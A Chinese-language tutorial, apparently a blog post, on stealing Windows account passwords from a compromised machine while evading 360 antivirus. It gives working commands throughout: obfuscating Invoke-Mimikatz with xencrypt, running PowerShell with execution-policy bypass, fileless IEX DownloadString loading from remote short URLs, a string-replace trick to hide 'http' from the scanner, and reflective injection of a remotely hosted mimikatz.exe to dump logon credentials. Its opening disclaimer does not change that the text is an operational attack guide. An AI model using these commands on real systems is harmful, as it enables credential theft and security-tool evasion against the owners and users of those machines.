*嚴正聲明：本文僅限於技術討論與分享，嚴禁用於非法途徑。

目標機system權限，安裝了360，準備獲取密碼。

mimikatz的exe,powershell版（可上github下載）網上版本已經被360已及各種殺軟殺的死死的，扔上去就掛

所以採用混淆加密方式來繞過殺軟，混淆腳本地址如下

https://github.com/the-xentropy/xencrypt

使用AES加密和Gzip / DEFLATE壓縮，每次調用都會生成一個唯一但是功能相同的腳本。它通過壓縮和加密輸入腳本並將此數據作爲有效載荷存儲在新腳本中來實現免殺，輸出腳本將在運行有效載荷之前對其進行解密和解壓縮。

使用方法

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1-OutFile xenmimi.ps1

還可以通過-Iterations標誌支持遞歸分層。

Invoke-Xencrypt -InFile invoke-mimikatz.ps1-OutFile xenmimi.ps1 -Iterations 100

可過360等大部分殺軟，但卡巴斯基被殺，已經可以達成目標了。

在win10運行，成功獲取賬號密碼：

扔到Win7上試試，出現報錯

因爲win7powershell版本爲2.0

混淆腳本採用AES加密和Gzip / DEFLATE壓縮，含有powershell2.0版本不支持調用的方法。難搞哦。要想辦法過w7+360，可採用powershell方式繞過

可在cmd下執行

powershell -exec bypass "import-module.\Invoke-Mimikatz.ps1;Invoke-Mimikatz

因目標安裝360，未混淆文件傳上去就會被殺並彈窗，所以採用遠程加載方法繞過，遠程加載方法會在內存中運行mimikatz,無文件落地由此來繞過殺軟

powershell "IEX (New-ObjectNet.WebClient).DownloadString(' http://is.gd/oeoFuI '); Invoke-Mimikatz-DumpCreds"

被360判斷爲PowerShell下載攻擊並彈窗，360針對powershell的http協議下載查殺，但是檢查內容只是命令中出現http,所以只需要一步簡單的替換即可繞過(‘htxtp://is.gd/oeoFuI’ -replace ‘x’,”)

（這裏有個坑。360這個zz，在判斷PowerShell下載攻擊後，接下來一段時間會直接對powershell拒絕訪問，實戰直接執行下面的命令）

powershell "IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://is.gd/oeoFuI' -replace 'x',''));Invoke-Mimikatz -DumpCreds"

即可繞過360獲取目標賬號密碼。

既然可以遠程加載powershell繞過殺軟，那遠程加載exe也同樣可以，powershell加載exe進內存運行需要PowerSploit中的Invoke-ReflectivePEInjection腳本，地址如下

https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

我們遠程加載Invoke-ReflectivePEInjection再遠程加載調用mimikatz.exe進內存以無文件落地方式繞過殺軟讀取賬號密碼（繞過PowerShell下載攻擊彈窗方式同上），命令如下

powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://suo.im/5FAjaC' -replace'x',''));Invoke-ReflectivePEInjection -PEUrl<a href="http://x.x.x.x/mimikatz.exe-ExeArgs">http://x.x.x.x/mimikatz.exe-ExeArgs</a>"sekurlsa::logonpasswords" -ForceASLR

-PEUrl ：包含要加載和執行的DLL / EXE的URL
-ExeArgs ：所要執行命令